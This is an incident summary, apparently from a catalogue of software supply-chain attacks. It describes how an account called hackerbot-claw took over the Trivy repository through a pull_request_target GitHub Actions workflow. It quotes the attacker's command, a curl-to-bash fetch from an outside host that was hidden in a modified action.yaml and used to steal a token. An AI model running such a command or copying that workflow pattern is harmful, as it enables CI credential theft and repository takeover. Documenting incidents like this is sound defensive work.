Trivy repository takeover installed hackerbot-claw

On February 28, 2026, an account calling itself hackerbot-claw opened pull request 10254 against Aqua Security's Trivy repository, a widely used open-source vulnerability scanner, and quietly took the project over within hours. No Trivy binary was poisoned in this round. The damage was done inside GitHub Actions.

The opening was a classic Pwn Request. Trivy's API Diff Check workflow ran on pull_request_target, the GitHub Actions trigger that gives a workflow repository-write permissions while still checking out untrusted fork code. The attacker modified .github/actions/setup-go/action.yaml in the fork so that what looked like the normal Go setup step instead ran curl -sSfL https://hackmoltrepeat.com/molt | bash. When Trivy's workflow fired, the script ran with the repository's privileges and exfiltrated a Personal Access Token.

With that token, the attacker pushed to the official repository, deleted releases, and defaced the project. StepSecurity, which catalogued the broader hackerbot-claw spree against several open-source projects, described Trivy as the most damaging compromise in the wave.

Aqua restored Trivy at v0.69.2 and revoked what it could, but cleanup was incomplete. Credentials surviving from the February takeover were used the following month to publish malicious v0.69.4 artifacts and rewrite action tags. That second incident is tracked separately at [[trivy-second-compromise]].

Motive

Credential Theft Vandalism

Attribution

Person

Cause

CI/CD Exploit

Transitive

No

Actor

Individual

• hackerbot-claw GitHub Actions Exploitationstepsecurity.io
• Official information about Trivy repository takeover incidentgithub.com